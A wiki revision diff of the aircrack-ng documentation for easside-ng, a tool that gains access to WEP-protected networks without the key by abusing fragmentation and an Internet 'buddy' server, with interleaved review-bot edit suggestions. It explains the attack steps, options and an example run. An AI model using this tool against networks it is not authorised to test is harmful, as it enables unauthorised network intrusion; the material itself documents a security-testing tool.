easside-ng
easside-ng [2009/09/05 23:27] – wiki-files.aircrack-ng.org become download.aircrack-ng.org/wiki-files mister_x | easside-ng [2013/03/19 18:21] (current) – Added link to the new page created of Besside-ng jano
Line 1: | Line 1: | ||
====== Easside-ng ====== | ====== Easside-ng ====== | ||
- | |||
- | ++++++ IMPORTANT ++++++\\ | ||
- | ++++++ IMPORTANT ++++++\\ | ||
- | ++++++ IMPORTANT ++++++\\ | ||
- | |||
- | This functionality will be available in a future release. It is NOT available currently. | ||
- | |||
- | ++++++ IMPORTANT ++++++\\ | ||
- | ++++++ IMPORTANT ++++++\\ | ||
- | ++++++ IMPORTANT ++++++\\ | ||
- | |||
===== Description ===== | ===== Description ===== | ||
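Review bot: the removed banner was the only statement on the page about availability ("This functionality will be available in a future release. It is NOT available currently."), and this hunk adds nothing in its place; if easside-ng has since shipped, add one line under the title naming the release that includes it so readers of the current revision can tell which version they need.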
Line 18: | Line 7: | ||
There are two primary papers "The Fragmentation Attack in Practice" | There are two primary papers "The Fragmentation Attack in Practice" | ||
- | In order to access the wireless network without knowing the WEP key is done by having | + | In order to access the wireless network without knowing the WEP key, we have the AP itself decrypt the packets. |
* The target access point must be able to communicate with the Internet. | * The target access point must be able to communicate with the Internet. | ||
Line 39: | Line 28: | ||
- Once a network is found, it tries to authenticate. | - Once a network is found, it tries to authenticate. | ||
- Once the program has successfully authenticated then it associates with the AP. | - Once the program has successfully authenticated then it associates with the AP. | ||
- | - After sniffing a single data packet, it proceeds to discover at least 1504 bytes of PRGA by sending out larger broadcasts and intercepting the relayed packets. | + | - After sniffing a single data packet, it proceeds to discover at least 1504 bytes of PRGA by sending out larger broadcasts and intercepting the relayed packets. |
- It then decrypts the IP network by guessing the next four bytes of PRGA using multicast frames and the linear keystream expansion technique. | - It then decrypts the IP network by guessing the next four bytes of PRGA using multicast frames and the linear keystream expansion technique. | ||
- It creates a permanent TCP connection with the " | - It creates a permanent TCP connection with the " | ||
Line 84: | Line 73: | ||
* Easside-ng constantly listens to the packets being transmitted by the AP. It then processes packets addressed to the TAP IP based on the MAC address or broadcasts. | * Easside-ng constantly listens to the packets being transmitted by the AP. It then processes packets addressed to the TAP IP based on the MAC address or broadcasts. | ||
* For each packet it needs to process, the packet must first be decrypted. | * For each packet it needs to process, the packet must first be decrypted. | ||
- | * Easside-ng creates a new packets composed of two fragments. | + | * Easside-ng creates a new packets composed of two fragments. |
* The AP receives the fragmented packet, decrypts each fragment and reassembles the fragments into a single packet. | * The AP receives the fragmented packet, decrypts each fragment and reassembles the fragments into a single packet. | ||
* The buddy server receives the decrypted packet from the AP by UDP. It then resends the decrypted information back to easside-ng. | * The buddy server receives the decrypted packet from the AP by UDP. It then resends the decrypted information back to easside-ng. | ||
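Review bot: the line "Easside-ng creates a new packets composed of two fragments" is touched by this hunk but keeps the same grammatical error on the + side; change "a new packets" to "a new packet" (or "new packets, each composed of two fragments", whichever matches the intended meaning).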
Line 105: | Line 94: | ||
So you may also be asking "What is the linear keystream expansion technique?" | So you may also be asking "What is the linear keystream expansion technique?" | ||
- | The program first obtains the PRGA from known plain text portion of the ARP request. Then it creates a new ARP request packet broken into two fragments. | + | The program first obtains the PRGA from known plain text portion of the ARP request. Then it creates a new ARP request packet broken into two fragments. |
The linear keystream expansion technique (Arbaugh inductive) is reverse | The linear keystream expansion technique (Arbaugh inductive) is reverse | ||
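Review bot: "obtains the PRGA from known plain text portion of the ARP request" is identical on both sides of this hunk and is still missing an article; suggest "from the known plaintext portion of the ARP request", which also matches the "linear keystream expansion" terminology used two lines later.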
Line 143: | Line 132: | ||
* -h Displays the list of options. | * -h Displays the list of options. | ||
- | * -v MAC address of the Acess Point (Optional) | + | * -v MAC address of the Access |
* -m | * -m | ||
* -i Source IP address to be used on the wireless LAN. Defaults to the decoded network plus " | * -i Source IP address to be used on the wireless LAN. Defaults to the decoded network plus " | ||
Line 156: | Line 145: | ||
NOTE: There are no parameters for buddy-ng. | NOTE: There are no parameters for buddy-ng. | ||
- | + | When you run easside-ng, it creates a file automatically in the current directory: | |
- | + | ||
- | When you run easside-ng, it creates a file automatically in the current directory | + | |
* prga.log - Contains the PRGA obtained through the fragmentation attack. | * prga.log - Contains the PRGA obtained through the fragmentation attack. | ||
Line 198: | Line 185: | ||
Where: | Where: | ||
- | * -f ath0 This is the wireless | + | * -f ath0 |
- | * -v 00: | + | * -v 00: |
- | * -c 9 This is the channel | + | * -c 9 |
- | * -s 10.116.23.144 | + | * -s 10.116.23.144 |
The system responds: | The system responds: | ||
Line 245: | Line 232: | ||
| | ||
- | Now you can send and receive packets to and from the AP network which in this case is 192.168.1.0/ | + | Now you can send and receive packets to and from the AP network which in this case is 192.168.1.0/ |
Line 261: | Line 248: | ||
First run easside-ng to obtain the prga file. Then run wesside-ng to flood the network and obtain the WEP key. It is really that simple! | First run easside-ng to obtain the prga file. Then run wesside-ng to flood the network and obtain the WEP key. It is really that simple! | ||
- | Playfully, this is known as "besside-ng". | + | Playfully, this is known as [[besside-ng|Besside-ng]]. |
==== Demonstrating Insecurity! ==== | ==== Demonstrating Insecurity! ==== | ||
Line 289: | Line 276: | ||
* It is running on Internet with a routeable IP address | * It is running on Internet with a routeable IP address | ||
- | * It is accessable | + | * It is accessible |
* Inbound and outbound UDP and TCP port 6969 is permitted. | * Inbound and outbound UDP and TCP port 6969 is permitted. | ||
easside-ng.1252186067.txt.gz · Last modified: 2009/09/05 23:27 by mister_x